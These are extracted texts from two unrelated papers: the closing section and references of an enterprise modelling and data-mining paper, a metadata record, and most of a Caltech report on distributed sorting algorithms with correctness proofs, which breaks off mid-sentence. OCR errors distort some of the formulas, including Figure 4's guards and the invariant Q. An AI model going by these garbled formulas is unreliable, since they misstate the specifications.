approach, best of breed (BoB), integrates components of a standard package and/or custom software. The BoB integration approach describes the specifications in order to integrate software systems especially for ERP applications developed by different software vendors (Light, 2001). BoB is not an integration environment, rather, it is a strategy that could provide flexible integrated enterprise solutions that are complementary to the the enterprise modeling and integration framework suggested in this paper. - Business processes modeling and automation using the workflow techniques and associated tools including workflow business process discovery and mining should have a very good potential (Aguilar-Savén 2004, Shen et al. 2004). However, workflow methods are not supported by this framework which is focused on data and its intelligent exploration mainly in order to gain knowledge. • Several enterprises especially from North America already use advanced IT support for advanced planning and scheduling systems based on the Supply Chain Organization Reference (SCOR) model (Stadtler and Kilger 2000). SCOR is not explicitly considered within this approach, but a particular system may use a SCOR model which arises from a different modeling approach. • The common knowledge enterprise model could generate redundant data, information and files even though this is thought to have been eliminated. • Web and text mining have not been considered even though they are very important for communication, collaboration and co-ordination within an extended enterprise. Additional investigations such as multi-tier architectures applied to enterprise information systems are needed to support this approach. These are especially important because of the above mentioned complexities. Web architectures and applications should be investigated and adopted, such as .NET architecture supported by MDA, and Web services which are standard modular applications that can be published, located, and invoked across the Web. The .NET architecture and Web services are the actual implementation alternatives for several enterprise applications, but the methodologies to integrate legacy systems and databases have not been fully identified. 7. Concluding remarks The modeling and integration framework presented in this paper provides a dynamic environment for enterprises and extended enterprises especially to accommodate the following complex and dissimilar software systems: • Applications to support Customer Relationship Management (CRM), Supply Chain Management (SCM) and Enterprise Resource Planning (ERP) applications. Examples of these systems are SAP R3, JD Edwards, I2 Technologies, Baan, Oracle Applications, PeopleSoft, Manugistics etc. • Knowledge discovery and data mining products such as PolyAnalyst™, Clementine, Weka, ArMiner etc. • Manufacturing and products models stored in databases such as Oracle, Object Store, and associated database management systems and applications. The framework is especially directed at enabling knowledge discovery and data mining activities to be encompassed within an enterprise’s existing standardized and referenced architectures and models. References ADAMO, J.M., 2001, Data Mining for Association Rules and Sequential Patterns, (Berlin:Springer-Verlag) ADRIAANS, P., ZANTINGE, D., 1996, Data Mining, (London:Addison-Wesley) BRAKER, M.A. (editor), 1999, *Knowledge Discovery and Data Mining*, (New York: The Institute of Electrical Engineers)
{"Source-Url": "https://dspace.lboro.ac.uk/dspace-jspui/bitstream/2134/9804/10/Paper_RE_submitted.pdf", "len_cl100k_base": 8345, "olmocr-version": "0.1.53", "pdf-total-pages": 20, "total-fallback-pages": 0, "total-input-tokens": 42527, "total-output-tokens": 12170, "length": "2e13", "weborganizer": {"__label__adult": 0.0005574226379394531, "__label__art_design": 0.0018301010131835935, "__label__crime_law": 0.0008149147033691406, "__label__education_jobs": 0.011077880859375, "__label__entertainment": 0.00018930435180664065, "__label__fashion_beauty": 0.00038504600524902344, "__label__finance_business": 0.013702392578125, "__label__food_dining": 0.0007634162902832031, "__label__games": 0.00109100341796875, "__label__hardware": 0.0014810562133789062, "__label__health": 0.00080108642578125, "__label__history": 0.0009965896606445312, "__label__home_hobbies": 0.00033593177795410156, "__label__industrial": 0.01297760009765625, "__label__literature": 0.000935077667236328, "__label__politics": 0.0005216598510742188, "__label__religion": 0.0007967948913574219, "__label__science_tech": 0.43017578125, "__label__social_life": 0.00021708011627197263, "__label__software": 0.06005859375, "__label__software_dev": 0.4580078125, "__label__sports_fitness": 0.0003674030303955078, "__label__transportation": 0.0017242431640625, "__label__travel": 0.00034046173095703125}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 54202, 0.02463]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 54202, 0.28117]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 54202, 0.89723]], "google_gemma-3-12b-it_contains_pii": [[0, 804, false], [804, 1875, null], [1875, 5307, null], [5307, 8705, null], [8705, 11904, null], [11904, 15550, null], [15550, 18883, null], [18883, 21917, null], [21917, 25094, null], [25094, 28163, null], [28163, 30904, null], [30904, 33871, null], [33871, 37027, null], [37027, 39510, null], [39510, 42693, null], [42693, 45251, null], [45251, 48292, null], [48292, 51179, null], [51179, 54202, null], [54202, 54202, null]], "google_gemma-3-12b-it_is_public_document": [[0, 804, true], [804, 1875, null], [1875, 5307, null], [5307, 8705, null], [8705, 11904, null], [11904, 15550, null], [15550, 18883, null], [18883, 21917, null], [21917, 25094, null], [25094, 28163, null], [28163, 30904, null], [30904, 33871, null], [33871, 37027, null], [37027, 39510, null], [39510, 42693, null], [42693, 45251, null], [45251, 48292, null], [48292, 51179, null], [51179, 54202, null], [54202, 54202, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 54202, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 54202, null]], "pdf_page_numbers": [[0, 804, 1], [804, 1875, 2], [1875, 5307, 3], [5307, 8705, 4], [8705, 11904, 5], [11904, 15550, 6], [15550, 18883, 7], [18883, 21917, 8], [21917, 25094, 9], [25094, 28163, 10], [28163, 30904, 11], [30904, 33871, 12], [33871, 37027, 13], [37027, 39510, 14], [39510, 42693, 15], [42693, 45251, 16], [45251, 48292, 17], [48292, 51179, 18], [51179, 54202, 19], [54202, 54202, 20]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 54202, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
e10e3ff3a9b196dbbbc93ebd07bad086c300c0a6
Distributed Sorting H. Peter Hofstee, Alain J. Martin, and Jan L. A. van de Snepscheut Computer Science Department California Institute of Technology Caltech-CS-TR-90-06 In this paper we present a distributed sorting algorithm, which is a variation on exchange sort, i.e., neighboring elements that are out of order are exchanged. We derive the algorithm by transforming a sequential algorithm into a distributed one. The transformation is guided by the distribution of the data over processes. First we discuss the case of two processes, and then the general case of one or more processes. Finally we propose a more efficient solution for the general case. 1. Program notation For the sequential part of the algorithms, we use a subset of Edsger W. Dijkstra's guarded command language [1]. For (sequential) statements $S_0$ and $S_1$, statement $S_0 || S_1$ denotes their concurrent execution. The constituents $S_0$ and $S_1$ are then called processes. The statements may share variables (cf. [6]). We transform our algorithms in such a way, however, that the final code contains no shared variables and all synchronization and communication is performed by message passing. The semantics of the communication primitives is as described in [5]. The main difference with C.A.R. Hoare's proposal in [3] is in the naming of channels rather than processes. In [4], the same author proposes to name channels instead of processes in communication commands, but differs from our notation by using one name per channel instead of our two: output command $R!E$ in one process is paired with input command $L?v$ in another process by declaring the pair $(R, L)$ to be a channel between the two processes. Each channel is between two processes only. When declaring $(R, L)$ to be a channel, we write the name on which the output actions are performed first and the name on which the input actions are performed last. For an arbitrary command $A$, let $c_A$ denote the number of completed $A$ actions, i.e., the number of times that command $A$ has been executed since initiation of the program's execution. The synchronization requirement (cf. [5]) fulfilled by a channel $(R, L)$ is that $$c_R = c_L$$ holds at any point in the computation. Note: It is sometimes attractive to weaken the synchronization requirement by putting some bound on \( cR - cL \). This may be a lower bound only, or both a lower and an upper bound. The maximum difference is then called the slack, since it indicates how far the synchronized processes can get out of step. The use of a nonzero slack sometimes leads to minor complications in proofs and definitions, and is not pursued here. The execution of a command results either in the completion of the action or in its suspension when its completion would violate the synchronization requirement. From suspension until completion an action is pending and the process executing the action is delayed. We introduce boolean \( qA \) equal to the predicate “an \( A \) action is pending”. The progress requirement states that actions are suspended only if their completion would violate the synchronization requirement, i.e., channel \((R, L)\) satisfies \[ \neg qR \lor \neg qL \] The \( n \)th \( R \) action is said to match the \( n \)th \( L \) action. The completion of a matching pair of actions is called a communication. The communication requirement states that execution of matching actions \( R!E \) and \( L?v \) amounts to the assignment \( v := E \). 2. A small/large sorter for two bags Given are two finite, nonempty bags of integers. The integers in the two bags are to be rearranged such that one bag is dominated by the other bag, i.e., no element of the first bag exceeds any element of the second bag. The number of elements of each of the two bags may not be changed. We use the following notation. The two bags to be sorted are \( b0 \) and \( b1 \); their initial values are \( B0 \) and \( B1 \) respectively. For bag \( b \), \( \#b \) denotes the number of elements in \( b \). Bag union and difference are denoted by \( + \) and \( - \) respectively. The number of times that a number \( x \) occurs in the bag union \( b0 + b1 \) is the number of occurrences of \( x \) in \( b0 \) plus the number of occurrences in \( b1 \). The number of occurrences of \( x \) in \( b0 - b1 \) is the number of occurrences of \( x \) in \( b0 \) minus the number of occurrences in \( b1 \), and is well-defined only if the latter difference is nonnegative. We do not distinguish between elements and singleton bags. Postcondition \( Z \) of the distributed sorting program is concisely written as follows. \[ Z: \#b0 = \#B0 \land \#b1 = \#B1 \land b0 + b1 = B0 + B1 \land \max(b0) \leq \min(b1) \] The first two conjuncts express that the size of the two bags is unaffected, the third conjunct expresses that the elements involved remain the same, and the fourth conjunct expresses that \( b0 \) is dominated by \( b1 \). Notice that \( \max(b0) < \min(b1) \) is a stronger requirement: in fact it is so strong that it cannot be established in general. The problem can simply be solved by repeatedly exchanging the maximum element of \( b0 \) and the minimum element of \( b1 \) until postcondition \( Z \) is established. This amounts to selecting the first three conjuncts of \( Z \) as invariant \[ \#b0 = \#B0 \land \#b1 = \#B1 \land b0 + b1 = B0 + B1 \] and the negation of the last conjunct of $Z$ as guard of the repetition. The program is $$\text{do } \max(b0) > \min(b1) \rightarrow b0, b1 := b0 + \min(b1) - \max(b0), b1 + \max(b0) - \min(b1) \text{ od}$$ The invariant is vacuously true upon initialization since then $b0 = B0 \land b1 = B1$. The invariant is maintained by the exchange statement, independently of the guard. Upon termination $\max(b0) \leq \min(b1)$ holds, which in conjunction with the invariant implies postcondition $Z$. We are left with the easy task of proving termination. Let variant function $s$ be the sum of the elements in $b0$ minus the sum of the elements in $b1$. Since $b0$ and $b1$ are finite bags with fixed union, $s$ is bounded from below. On account of the guard, every exchange decreases the sum of the elements in $b0$ and increases the sum of the elements in $b1$, and thereby decreases $s$. Hence, the loop terminates. 3. Program transformation We shall now transform the program, under invariance of its semantics, so as to partition it into two sets of (almost) noninterfering statements. We introduce fresh variables both for this purpose and for avoiding repeated evaluation of $\max(b0)$ and $\min(b1)$. When we have two sets of noninterfering statements they can be executed by two processes, which is what we aim at. The interference that remains translates into communication or synchronization actions. Introducing $M$ and $m$ to avoid reevaluation of $\max$ and $\min$, and copies $LM$ and $rm$ to reduce interference yields the program in Figure 1. \begin{verbatim} M, m := max(b0), min(b1); rm, LM := m, M; do guard \rightarrow b0, b1 := b0 + rm - M, b1 + LM - m; M, m := max(b0), min(b1); rm, LM := m, M od \end{verbatim} Notice that guard $\max(b0) > \min(b1)$ can be rewritten in many ways, including $M > rm$ and $LM > m$. In Figure 1, we have not made a choice yet, and both rewrites will be used later (which is the reason for not writing down a specific guard here). The bag differences in $b0 + rm - M$ and $b1 + LM - m$ are well-defined since $M$ is an element of $b0$ and $m$ is an element of $b1$. Apart from the concurrent assignment $rm, LM := m, M$ we have partitioned the program into two sets of noninterfering statements. Since the order of noninterfering statements can be swapped freely, we can modify the program slightly so as to group together the actions on $b0, M, rm$ and the actions on $b1, m, LM$. We obtain Figure 2 in which a suggestive layout has been used. \[ M := \max(b_0) \quad \| \quad m := \min(b_1); \] \[ rm := m \quad \| \quad LM := M; \] \[ \text{do guard } \rightarrow \\ (b_0 := b_0 + r_m - M; \quad M := \max(b_0)) \quad \| \quad (b_1 := b_1 + LM - m; \quad m := \min(b_1)); \] \[ rm := m \quad \| \quad LM := M \] \[ \text{od} \] -Figure 2- Now, assume that we can split the action \( rm := m \parallel LM := M \) into two concurrent parts, \( X \) and \( Y \) say, such that \( e_X = c_Y \) and \( \neg q_X \lor \neg q_Y \) hold, and such that the completion of \( X \) and \( Y \) is equivalent to \( rm := m \parallel LM := M \). We may rewrite the program from Figure 2 into \( (p_0 \parallel p_1) \) as given in Figure 3. Notice that we have used both ways of rewriting the guard mentioned above. \[ p_0 \equiv M := \max(b_0); \quad X; \] \[ \text{do } M > r_m \rightarrow b_0 := b_0 + r_m - M; \quad M := \max(b_0); \quad X \text{ od} \] \[ p_1 \equiv m := \min(b_1); \quad Y; \] \[ \text{do } LM > m \rightarrow b_1 := b_1 + LM - m; \quad m := \min(b_1); \quad Y \text{ od} \] -Figure 3- The correctness of the program in Figure 3 can be proved in two ways. We may either prove the correctness of the transformation, or we may prove the correctness of the program in Figure 3 directly. Proving the correctness of the transformation is the more elegant (and slightly easier) of the two. Yet we give a direct proof of the program's correctness, because it comes closer to suggesting the generalization to any number of processes. We postulate that \( P \) is an invariant of the distributed program. \[ P : \quad \max(b_0) = M = LM \land \min(b_1) = m = r_m \land \\ \#b_0 = \#B_0 \land \#b_1 = \#B_1 \land \ b_0 + b_1 = B_0 + B_1 \] What do we mean by claiming that \( P \) is an invariant of \( (p_0 \parallel p_1) \)? Both \( p_0 \) and \( p_1 \) contain a loop and by invariant we mean in this case that \( P \) holds when both processes have completed the initialization (and no further actions), and that \( P \) is maintained if both processes perform one step of the loop. Since initialization and loop body end with action \( X \) in \( p_0 \) and action \( Y \) in \( p_1 \), and since we have \( c_X = c_Y \), this makes sense. Notice that, for example, we do not claim that \( P \) holds if \( p_0 \) has completed \( X \), whereas \( p_1 \) has completed \( Y \) and also the subsequent update of \( b_1 \). In order to check the invariance, we have to verify - \{true\} (M := \max(b0); X) \parallel (m := \min(b1); Y) \{P\} - P \Rightarrow (M > rm \equiv LM > m) - \{P \land M > rm \land LM > m\} \( (b0 := b0 + rm - M; \ M := \max(b0); \ X) \parallel (b1 := b1 + LM - m; \ m := \min(b1); \ Y) \{P\} \). All three follow from the choice of P and the assumptions on X and Y. We are left with the task of providing X and Y in terms of the commands that we have at our disposal. Using channels (R, L) and (l, r), with zero slack, we may write \[ X \equiv R!M; \ r?rm \] \[ Y \equiv L?LM; \ l!m \] Since \( cX = c_r \) and \( cY = c_l \) by construction, and since \( c_r = c_l \) by definition, we have \( cX = cY \). Actions X and Y may be suspended on either channel, hence \[ qX \equiv (cR = c_r \land qR) \lor (cR = c_r + 1 \land qr) \] \[ qY \equiv (cL = c_l \land qL) \lor (cL = c_l + 1 \land ql) \] We calculate \[ qX \land qY \] \[ = \{cR = c_L, \ c_r = c_l\} \] \[ (cR = c_r = c_L = c_l \land qR \land qL) \lor (cR = c_r + 1 = c_l = c_l + 1 \land qr \land ql) \] \[ \Rightarrow \] \[ (qR \land qL) \lor (qr \land ql) \] \[ = \{\neg qR \lor \neg qL, \neg qr \lor \neg ql\} \] \[ \text{false} \] i.e., we have \( \neg qX \lor \neg qY \) as required. From the communication requirement it follows that \( X \parallel Y \) is equivalent to \( rm := m \parallel LM := M \). The following, more symmetric, version of X and Y also meets the requirements. \[ X \equiv R!M \parallel r?rm \] \[ Y \equiv L?LM \parallel l!m \] The above two versions are also correct if the slack is positive. The version \[ X \equiv R!M; \ r?rm \] is correct only if the slack is positive. Observe that the verification of the correctness of the program fits the following pattern. We postulate an invariant and show that it holds in the initial state and is not falsified by an iteration of the loop. We provide a variant function that is bounded from below and decreases with each iteration of the loop. Because the variant function is integer valued, this implies that the loop terminates. Upon termination we have the truth of the invariant and the falsity of the loop's guard, and we show that this combination implies the postcondition. So much is standard practice in the case of sequential programs. What we add for our distributed programs is the proof of absence of deadlock. Deadlock occurs if one of two processes connected by a channel initiates a communication along the channel and the other process does not. We, therefore, show that mutual communications are initiated under the same condition. 4. More bags The problem is generalized as follows. Given is a finite sequence of (one or more) finite nonempty bags and a linear array of processes, each of which contains one of the bags and communicates with neighbors in the array to sort the bags in such a way that each bag is dominated by the next bag in the sequence, and such that the size of the bags remains constant. The generalized problem is significantly different from the two-bag version in the following sense. Consider sequence ABC of three bags. If A is dominated by B but B is not dominated by C then an exchange of elements between B and C may cause B to no longer dominate A, i.e., it may necessitate an exchange between A and B. This shows that the process that stores A cannot be terminated when A is dominated by B. The proper thing to do is to terminate a process when the bag it stores is dominated by all bags to the right of it and dominates all bags to the left of it. The two algorithms that follow are both based on exchanging elements of neighboring bags, and termination detection while ensuring progress is the hard part of the problem. In order to avoid excessive use of subscripts, we use the following notation. For some anonymous process, \( b \) is the bag it stores with initial value \( B \), \( rb \) is the union of all bags to its right with initial value \( rB \), and \( lb \) is the union of all bags to its left with initial value \( lB \). Notice that \( lB \) and \( rB \) are the empty bag \( \emptyset \) for the leftmost and rightmost processes respectively. The required postcondition of the program can be written as a conjunction of terms, one for each process, viz. \[ \max(lb) \leq \min(b) \land \max(b) \leq \min(rb) \] We find it more attractive to rewrite this into \[ \max(lb) \leq \min(b + rb) \land \max(lb + b) \leq \min(rb) \] since the first term expresses that domination has been achieved between the union of all bags to the left and the remaining bags, and the second term does so for all bags to the right. The invariant is obtained by introducing a variable for each of the four quantities involved, and by retaining the size restriction on the bags. Hence, the invariant of the distributed program is the conjunction of a number of terms, one for each process. Each such term is \[ P : \max(lb) = LM \land \max(lb+b) = M \land \min(rb) = rm \land \min(b+rb) = m \\ \land \#b = \#B \land lb + b + rb = lB + B + rB \] where \(\max(\emptyset) = -\infty\) and \(\min(\emptyset) = +\infty\). First we concentrate on the statements that initialize the variables such that \(P\) holds. Maxima are simply propagated from left to right, and minima from right to left. \[ (L?LM; M := \max(b + LM); R!M) \\ \quad \parallel (r?rm; m := \min(b + rm); l!m) \] Action \(L?LM\) is understood to be \(LM := -\infty\) for the leftmost process, and \(r?rm\) is understood to be \(rm := +\infty\) for the rightmost process. Action \(l!m\) is understood to be \(skip\) for the leftmost process, and \(R!M\) is understood to be \(skip\) for the rightmost process. These conventions can be implemented with dummy processes next to the two extreme processes, or with conditional statements in the two extreme processes. Next we concentrate on the loop, i.e., we concentrate on maintaining the invariant. Observe that an element from \(lb\) should be exchanged with an element from \(b + rb\) if \(\max(lb) > \min(b + rb)\), i.e., if \(LM > m\). Like in the case of two bags, the maximum element from \(lb\) is exchanged with the minimum element from \(b + rb\). Similarly, the minimum element from \(rb\) is exchanged with the maximum element from \(lb + b\) if \(\max(lb + b) > \min(rb)\), i.e., if \(M > rm\). This suggests the program shown in Figure 4. --- \[ (L?LM; M := \max(b + LM); R!M) \parallel (r?rm; m := \min(b + rm); l!m); \\ \text{do } LM > m \land M > rm \\ \text{do } b := b + LM - M + rm - m; \\ (L?LM; M := \max(b + LM); R!M) \parallel (r?rm; m := \min(b + rm); l!m) \\ \text{do } \quad LM \land M \leq rm \\ \text{do } b := b + LM - m; \\ (L?LM; M := \max(b + LM)) \parallel (m := \min(b); l!m) \\ \text{do } \quad LM \leq m \land M > rm \\ \text{do } b := b + rm - M; \\ (M := \max(b); R!M) \parallel (r?rm; m := \min(b + rm)) \] --- \text{-Figure 4-} We prove the correctness of this algorithm. Consider two processes that are neighbors in the linear array. Bag \(lb + b\) in the left process is bag \(b\) in the right process, hence \(M\) in the left process has the same value as $LM$ in the right process. Similarly, bag $rb$ in the left process is bag $b + rb$ in the right process, hence $rm$ in the left process has the same value as $m$ in the right process. The left process initiates a communication with the right process if and only if $M > rm$ holds, and the right process initiates a communication with the left process if and only if $LM > m$ holds. Consequently, the two processes initiate their mutual communications under the same condition, which excludes deadlock. Because of the above-established correspondence between $M$ and $rm$ in one process and $LM$ and $m$ in its righthand neighbor, updating the bags leaves the union of all bags constant provided that an element is removed from a bag only if it is contained in that bag. (If this condition is satisfied then every $+LM$ and $-m$ cancel against a left-neighboring $-M$ and $+rm$.) For example, in order to show that this condition is met for $b := b + LM - M + rm - m$ we prove that $M$ is in $b + LM$, $m$ is in $b + rm$, and $M \neq m$. We are not in the simple situation that we can show that $M$ is in $b$ instead of in $b + LM$: the element $M$ that is being removed from the bag is sometimes the element $LM$ that has just been added. Notice that the order of the bag operations is important: $b := b + LM - M + rm - m$ and $b := b + LM - m + rm - M$ are not equivalent. We prove (a) $LM > m \land M > rm \Rightarrow M \in b + LM \land m \in b + rm \land M \neq m$ (b) $LM > m \land M \leq rm \Rightarrow m \in b + LM$ (c) $LM \leq m \land M > rm \Rightarrow M \in b + rm$ case (a) $$M \in b + LM \land m \in b + rm \land M \neq m$$ $$= \{ P \}$$ $$\max(lb + b) \in b + \max(lb) \land \min(b + rb) \in b + \min(rb) \land \max(lb + b) \neq \min(b + rb)$$ $$\Leftarrow \{ \max(lb + b) = \max(b + \max(lb)), \min(b + rb) = \min(b + \min(rb)) \}$$ $$\max(lb + b) > \min(b + rb)$$ $$\Leftarrow \{ \max(lb + b) \geq \max(lb), P \}$$ $LM > m$ case (b) $$m \in b + LM$$ $$= \{ P \}$$ $$\min(b + rb) \in b + \max(lb)$$ $$\Leftarrow \{ \min(b) \in b \}$$ $$\min(b + rb) = \min(b)$$ $$\Leftarrow \max(b) \leq \min(rb)$$ $$\Leftarrow \{ \max(b) \leq \max(lb + b), P \}$$ $M \leq rm$ case (c) is similar to case b. Termination of the algorithm follows directly from the observation that, in every step of the iteration, the number of inversions is decreased. (An inversion is a pair of elements from two different bags, where the left element exceeds the right element.) The number of inversions is a natural number and, hence, bounded from below which implies termination. Upon termination we have a state that satisfies both the invariant and the negation of all three guards. We, therefore, have \[ P \land LM \leq m \land M \leq rm \] \[ \Rightarrow \max(lb) \leq \min(b + rb) \land \max(lb + b) \leq \min(rb) \] upon termination, which is the required postcondition. Notice that the algorithm is not correct if the last two guards are weakened to \( LM > m \) and \( M > rm \) respectively. It is then possible for elements to be removed from a bag of which they are not an element, implying that the union of all bags is not constant. Statement \( M := \max(b + LM) \) does not change \( M \) in the second guarded command, and may, therefore, be omitted. Similarly for \( m := \min(b + rm) \) in the third guarded command. 5. A more efficient solution The invariant proposed in the previous section was easy to guess (and understand), and led to a simple program. On closer inspection, however, it turns out that the program is not very efficient. Each step of the loop contains a construct for propagating maxima from left to right, and minima from right to left. This propagation requires time proportional to the number of bags, making the execution time of the whole program quadratic in the number of bags. Operationally speaking, the processes are suspended most of the time on communications of global extremes. It seems to be more attractive to perform some exchanges of local extremes between neighbors in the mean time: we may hope to obtain a program whose execution time is linear in the number of bags instead of quadratic. This idea is not easily translated into a program, mainly because detecting the end of "the mean time" is nontrivial. A similar effect, however, can be obtained in a different way. Exchanges of local extremes between neighbors may be performed while, in passing, global extremes are computed. The global extremes can be computed by some sort of approximation technique. Formally, this amounts to weakening the invariant from \( LM = \max(lb) \) to \( LM \geq \max(lb) \), and \( rm = \min(rb) \) to \( rm \leq \min(rb) \). If we stick to the terms \( M = \max(b + LM) \) and \( m = \min(b + rm) \), as well as the other terms, then the conjunction of \( LM \leq m \) and \( M \leq rm \) and the invariant implies the postcondition. Hence, the weaker invariant is still sufficiently strong. If we aim at a program whose structure is similar to the program in the previous section, we have a loop in which each step corresponds to a communication with the left neighbor, or with the right neighbor, or both. Deadlock is avoided if neighbors initiate their mutual communications under the same condition. Since only approximations of global extremes are locally available, we cannot simply use \( LM > m \) and \( M > rm \). Since \( LM \) is obtained from the, previously communicated, left neighbor's \( M \), the left neighbor \begin{verbatim} if \( lb = 0 \rightarrow LM := -\infty \) \( lb \neq 0 \rightarrow LM := +\infty \) \fi; if \( rb = 0 \rightarrow rm := +\infty \) \( rb \neq 0 \rightarrow rm := -\infty \) \fi; \( M, PM, m, pm := \max(b + LM), +\infty, \min(b + rm), -\infty; \) do {\( LM > pm \land PM > rm \rightarrow \)} \( L?(x, LM) \parallel l!(\min(b), m) \parallel r?(y, rm) \parallel R!(\max(b), M); \) if \( x > \min(b) \land \max(b) > y \rightarrow b := b - \min(b) - \max(b) + x + y \) \( \parallel x > \min(b) \land \max(b) \leq y \rightarrow b := b - \min(b) + x \) \( \parallel x \leq \min(b) \land \max(b) > y \rightarrow b := b - \max(b) + y \) \( \parallel x \leq \min(b) \land \max(b) \leq y \rightarrow \text{skip} \) \fi; \( M, PM, m, pm := \max(b + LM), M, \min(b + rm), m \) \end{verbatim} \begin{verbatim} \| LM > pm \land PM \leq rm \rightarrow \) \( L?(x, LM) \parallel l!(\min(b), m); \) if \( x > \min(b) \rightarrow b := b - \min(b) + x \) \( \parallel x \leq \min(b) \rightarrow \text{skip} \) \fi; \( M, m, pm := \max(b + LM), \min(b + rm), m \) \end{verbatim} \begin{verbatim} \| LM \leq pm \land PM > rm \rightarrow \) \( r?(y, rm) \parallel R!(\max(b), M); \) if \( \max(b) > y \rightarrow b := b - \max(b) + y \) \( \parallel \max(b) \leq y \rightarrow \text{skip} \) \fi; \( M, PM, m := \max(b + LM), M, \min(b + rm) \) \end{verbatim} o\end{verbatim} \begin{quote} \textbf{-Figure 5-} \end{quote} is to initiate a communication based on the previous value of \( M \), say \( PM \). This leads to invariant \( Q \) and to the program of Figure 5. \( Q : \quad LM \geq \max(lb) \land PM \geq M = \max(b + LM) \land \min(rb) \land pm \leq m = \min(b + rm) \land \#b = \#B \land lb + b + rb = lB + B + rB \) Notice that, due to the exchange of local extremes between neighbors rather than the propagation of global extremes, it may be necessary to replace two elements from the local bag. Hence, this algorithm is applicable only to the case in which each bag (except for the leftmost and rightmost bags) contains at least two elements. We prove the correctness of this algorithm. Consider two processes that are neighbors in the linear array. We show that $PM$ and $rm$ in the left process have the same value as $LM$ and $pm$ in the right process. Initially we have $PM = +\infty$ and $rm = -\infty$ in the left process (since its $rb$ is nonempty). Similarly we have $LM = +\infty$ and $pm = -\infty$ in the right process. The four variables are assigned a new value only when the two processes communicate with each other. The relevant statements are $$r?(y, rm) \parallel R!(\max(b), M); \quad PM := M$$ in the left process, and $$L?(x, LM) \parallel l!(\min(b), m); \quad pm := m$$ in the right process. Inspection reveals that both $PM$ and $LM$ are assigned the value $M$, and that both $rm$ and $pm$ are assigned the value $m$. Hence, the correspondence between the variables is maintained. Consequently, the two processes initiate their mutual communications under the same condition, which excludes deadlock. Next we show that the operations on $b$ do not falsify the invariant. Inspection of the communication statements (as in the paragraph above) reveals that $\max(b)$ and $y$ in the left process correspond to $x$ and $\min(b)$ in the right process. Hence the updates of the bags are performed under the same condition and change neither the union of the bags nor the size of each bag. Notice that the assumption $\#b \geq 2$ is essential here. In the same vein the invariance of $LM \geq \max(lb)$ and $PM \geq M = \max(b + LM)$ may be proved. It remains to prove termination. To that end we strengthen the invariant to express that $M$ is a very good approximation of $\max(lb + b)$. In fact, we have either $M = +\infty$ or $M = \max(lb + b)$. We can even prove that also $M = \max(b)$ holds in the latter case. This expresses the (strong) property that the largest value of $lb + b$ resides in bag $b$, and that the second largest value of $lb + b$ resides either in $b$ or in the left-neighbor’s bag, etc.. Furthermore, we show that $M = +\infty$ does not persist too long. More precisely we show that, in the process which has $k$ other processes to its left, $M = \max(b) = \max(lb + b)$ holds after $k$ iterations of the loop. We postulate that $$LM = PM = M = +\infty \quad \vee \quad (+\infty > LM \geq \max(lb) \land PM \geq M = \max(b) = \max(lb + b))$$ is an invariant, and we verify this claim. Initially $M = +\infty$ holds in every process except in the leftmost process ($k = 0$) in which $M = \max(b) = \max(lb + b)$. If $M = +\infty$ then the process initiates a communication to the left (since $M = +\infty$ implies $LM = +\infty$, and $pm < +\infty$). The relevant statements are $$L?(x, LM) \cdots$$ if $x > \min(b) \ldots \rightarrow b := b - \min(b) + x \cdots$ fi; $$M := \max(b + LM)$$ together with $$R!(\max(b), M)$$ in the left process. If $M = +\infty$ holds in the left process prior to this step, then $LM = M = +\infty$ holds in the right process after this step. If $M = \max(b) = \max(lb + b)$ holds in the left process prior to this step, then the statement $L? (x, LM)$ in the right process leads to $x = LM = \max(lb)$. Hence, the updates of $b$ and $M$ lead to $M = \max(b) = \max(lb + b)$ in the right process, one iteration after this relation has been established in its left neighbor. Notice that the update of the bag in the left neighbor process may falsify $LM = \max(lb)$, but $LM \geq \max(lb)$ is maintained. As a result, in each process we have $M = \max(b) = \max(lb + b)$ after a number of steps equal to the number of processes. Similarly, $m = \min(b) = \min(b + rb)$ holds. When this state has been reached it is not guaranteed that the variant function from the previous two sections is decreased with every iteration of the loop. That variant function contained the bags only, and it is possible that no bag is changed by an iteration of the loop. However, if in this state the bag is not changed then it is the last iteration of the loop: if, for example, $LM > pm$ and $x \leq \min(b)$ then $LM = x \leq \min(b) = m$, and $pm$ is set to $m$, thereby falsifying $LM > pm$ which excludes further iterations containing a communication to the left. Upon termination we have the invariant and the negation of the guards \[ Q \land LM \leq pm \land PM \leq rm \] \[ \Rightarrow \] \[ \max(lb) \leq LM \leq pm \leq m = \min(b + rm) \land \] \[ \max(b + LM) = M \leq PM \leq rm \leq \min(b) \] \[ \Rightarrow \] \[ \max(lb) \leq \min(b + rb) \land \max(lb + b) \leq \min(rb) \] which is the required postcondition. The time complexity of the present solution is linear in the number of bags, $N$ say. Thus, we have gained a factor of $N$ at the expense of sending two integers per communication instead of one, and the addition of two integer variables per process. If each bag contains $k$ elements, the number of iterations is $N \cdot k$ in the worst case. Assuming that the operations on a bag are $O(\log(k))$ each, this implies that the worst case time complexity is $O(N \cdot k \cdot \log(k))$. In this program the guards of the second and third alternative of the loop may be weakened to $LM > pm$ and $PM < rm$ respectively, without falsifying the invariant. It has the advantage that the program may be simplified (by omitting the first alternative) and that the requirement $\#b \geq 2$ may be weakened to $\#b \geq 1$, but it has the distinct disadvantage that the program does not necessarily terminate: if both guards are true it is possible that selection of one of the alternatives does not change the state in either of the two processes involved. If fair selection of the 